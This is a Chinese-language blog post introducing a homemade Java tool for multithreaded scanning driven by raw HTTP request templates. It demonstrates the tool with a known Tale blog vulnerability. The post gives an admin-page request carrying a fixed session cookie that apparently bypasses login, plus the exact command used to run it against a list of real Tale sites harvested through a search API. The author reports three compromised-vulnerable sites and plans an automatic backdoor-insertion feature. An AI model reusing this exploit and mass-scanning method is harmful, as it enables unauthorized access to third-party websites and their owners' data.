花了一天的时间造的轮子,用Java写的

github地址ScanFramwork-Java

由三个大类组成,支持导出结果到文件/批量多线程扫描/自定义正则匹配结果/文本数据包直接解析发送(与burp拦截格式和sqlmap -r格式相同)
盲注类-p sleep和自动插入后门backdoor保留,暂未实现

用法:

这里使用上次挖出的Tale博客系统漏洞来测试,
设置post.txt为模板

GET /admin HTTP/1.1
Host: tale.biezhi.me
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://tale.biezhi.me/admin
Cookie: S_L_ID=3OCjFvU8Cps0UR
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

这里的Host程序会自动换成需要测的地址,其他的作为模板不变

通过某些方式(如百度api)获得一些使用tale搭建的网站域名,保存在targets.txt中

如果返回含有“/admin/profile”字符串则说明成功利用漏洞,这里设置-p “match:./admin/profile.“,match:表示匹配后面的正则表达式pattern。

设定输出为res.txt

执行命令:
java -jar .\ScanFramwork.jar -o res.txt -p "match:.*/admin/profile.*" -t targets.txt -r
post.txt

(en。。判断必要参数好像有点问题,不管了)

成功检测到了其中三个有此漏洞的系统。
输出结果在res.txt中